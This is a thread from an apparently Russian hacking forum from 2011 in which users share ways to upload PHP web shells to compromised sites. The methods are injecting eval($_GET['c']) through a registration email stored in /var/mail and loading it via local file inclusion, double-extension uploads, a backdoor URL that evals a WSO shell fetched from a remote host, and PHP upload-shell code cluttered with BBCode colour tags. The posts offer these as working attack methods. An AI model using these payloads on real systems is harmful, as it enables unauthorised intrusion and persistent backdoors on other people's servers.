 |
|
13.12.2011, 01:30
|
|
Познающий
Регистрация: 25.12.2009
Сообщений: 95
С нами:
8619861
Репутация:
51
|
|
С одной стороны, зная возраст ТС, как-то не хочется критиковать. Ведь это еще "начала", и на данном этапе у ТС ярко выражен энтузиазм и желание открыть что-то новое как для себя, так и для других.
Но с другой стороны меня всегда поражают люди (причем не с хорошей стороны), которые выходят танцевать на сцену, дабы показать зрителям их мастерство после недели-двух тренировок.
Думаю мысль моя ясна и понятна.
Я посмею дополнить топик еще одним способом, о котором знаю, а именно заливка шелла через обычное мыльное письмецо. Делается просто. Например у нас есть какая-нить CMS-ка или даже просто самописный двиг, в котором где-то, куда-то иногда отправляются письма. Например, с активацией регистрации и так далее. Дело в том, что такие письма могут быть локально сохранены на nix-системах. Если рассматривать как пример форму активации аккаунта, то введем, например, как логин eval($_GET['c']); а как свое мыло впишем apache@localhost. Таким образом письмо будет отправлено на тот же демон хттпд и сохранено где-то в /var/mail с именем юзера хттпд. Думаю далее действия очевидны, имея, например, локальный инклуд мы можем прогрузить шелл инклудя письмецо с передачей кода загрузки шелла в параметре $_GET['c'].
|
|
|
13.12.2011, 02:02
|
|
Новичок
Регистрация: 01.12.2011
Сообщений: 8
С нами:
7604246
Репутация:
0
|
|
"Мини-шелл", - убило нах
Вообще, ТС, твой "мини-шелл" правильно называть бэк-дором.
И это есть стандартные методы заливки.
Если бы обьяснил как сделать инклуд бэк-дора в index.php к примеру, то статья заслужила бы название "не стандартные..."
|
|
|
|
13.12.2011, 07:35
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами:
7604246
Репутация:
55
|
|
Это все конечно хорошо, но обсуждалось уже 100500 раз, смотреть нужно по ситуации, что там есть чтобы залиться, не только же через админки льют. И про phpmyadmin тоже обсуждалось, и видео такое же снимали...
Дополнение тебе:
При неправильной конфигурации сервера если залить на сервер что то типа такого asdf.php.asdf, то есть вероятность что выполниться php. Потому как сервер будет сначала искать расширение asdf и после того как не найдет выполнит php. (могу конечно ошибаться с описанием, но такой способ у меня срабатывал несколько раз как на nix так и на windows серверах).
|
|
|
|
13.12.2011, 15:17
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Сообщение от |qbz|
С одной стороны, зная возраст ТС, как-то не хочется критиковать. Ведь это еще "начала", и на данном этапе у ТС ярко выражен энтузиазм и желание открыть что-то новое как для себя, так и для других.
Но с другой стороны меня всегда поражают люди (причем не с хорошей стороны), которые
выходят танцевать на сцену
, дабы показать зрителям их мастерство после недели-двух тренировок.
Думаю мысль моя ясна и понятна.
Я посмею дополнить топик еще одним способом, о котором знаю, а именно заливка шелла через обычное мыльное письмецо. Делается просто. Например у нас есть какая-нить CMS-ка или даже просто самописный двиг, в котором где-то, куда-то иногда отправляются письма. Например, с активацией регистрации и так далее. Дело в том, что такие письма могут быть локально сохранены на nix-системах. Если рассматривать как пример форму активации аккаунта, то введем, например, как логин eval($_GET['c']); а как свое мыло впишем apache@localhost. Таким образом письмо будет отправлено на тот же демон хттпд и сохранено где-то в /var/mail с именем юзера хттпд. Думаю далее действия очевидны, имея, например, локальный инклуд мы можем прогрузить шелл инклудя письмецо с передачей кода загрузки шелла в параметре $_GET['c'].
. А на счёт опыта в погорячились.. спросите хоть у WinsTrooll'a , и он вам ответит, что работаем уже не первый год
Сообщение от Vici
"Мини-шелл", - убило нах
Вообще, ТС, твой "мини-шелл" правильно называть бэк-дором.
И это есть стандартные методы заливки.
Если бы обьяснил как сделать инклуд бэк-дора в index.php к примеру, то статья заслужила бы название "не стандартные..."
Такой вид шелла/бек-дора не раз назывался на хакслэнге мини-шеллом, так что споров тут быть не должно, кролик.
Сообщение от trololoman96
Это все конечно хорошо, но обсуждалось уже 100500 раз, смотреть нужно по ситуации, что там есть чтобы залиться, не только же через админки льют. И про phpmyadmin тоже обсуждалось, и видео такое же снимали...
Дополнение тебе:
При неправильной конфигурации сервера если залить на сервер что то типа такого asdf.php.asdf, то есть вероятность что выполниться php. Потому как сервер будет сначала искать расширение asdf и после того как не найдет выполнит php. (могу конечно ошибаться с описанием, но такой способ у меня срабатывал несколько раз как на nix так и на windows серверах).
Не замечал, чтобы это уж прямо ВСЁ обсуждалось 100500 раз, ведь когда-то сам искал, и найти не мог. А что касается "asdf.php.asd" - то это и есть самый банальный способ залития шелла, и все о нём знают.
|
|
|
|
13.12.2011, 20:19
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Уберите либо "не" из заголовка, либо пробел после "не". Желательно первое.
|
|
|
|
13.12.2011, 20:32
|
|
Познающий
Регистрация: 25.12.2009
Сообщений: 95
С нами:
8619861
Репутация:
51
|
|
Сообщение от None
За способ спасибо, обязательно добавлю. А на счёт опыта в погорячились.. спросите хоть у WinsTrooll'a , и он вам ответит, что работаем уже не первый год
Кто это? И если не первый год, ты в яслях начал что-ли хачить?
|
|
|
|
13.12.2011, 22:16
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Сообщение от |qbz|
Кто это?
И если не первый год, ты в яслях начал что-ли хачить?
Кто это? да вот же /member.php?u=33917
Меня в яслях небыло.
|
|
|
|
14.12.2011, 00:18
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами:
9285182
Репутация:
340
|
|
Спасибо. Оформлено читабельно.
Видно что ТС старался, в написании и оформлении статьи.
|
|
|
|
14.12.2011, 00:52
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Сообщение от Fooog
Спасибо. Оформлено читабельно.
Видно что ТС старался, в написании и оформлении статьи.
Да, на этот раз много усилий приложил к оформлению.
|
|
|
|
14.12.2011, 06:43
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Доп:
1.Вообще можно заевалить WSO без его физической загрузки на сервер. Для этого убираем Остальное заевалим таким способом:
http://site.ru/backdoor.php?cmd=eval(file_get_contents('http://url/ws.txt'));
2. Загрузка прямо из компьютера, евалим это:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"
Shell:
"[/COLOR][COLOR="#007700"];
if(!empty([/COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]))
{
@[/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],
[/COLOR][COLOR="#DD0000"]'./'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]) ?
print[/COLOR][COLOR="#DD0000"]'File '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]].
[/COLOR][COLOR="#DD0000"]' uploaded!
'[/COLOR][COLOR="#007700"]: print[/COLOR][COLOR="#DD0000"]'Try...
'";
}[/COLOR][/COLOR]
.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
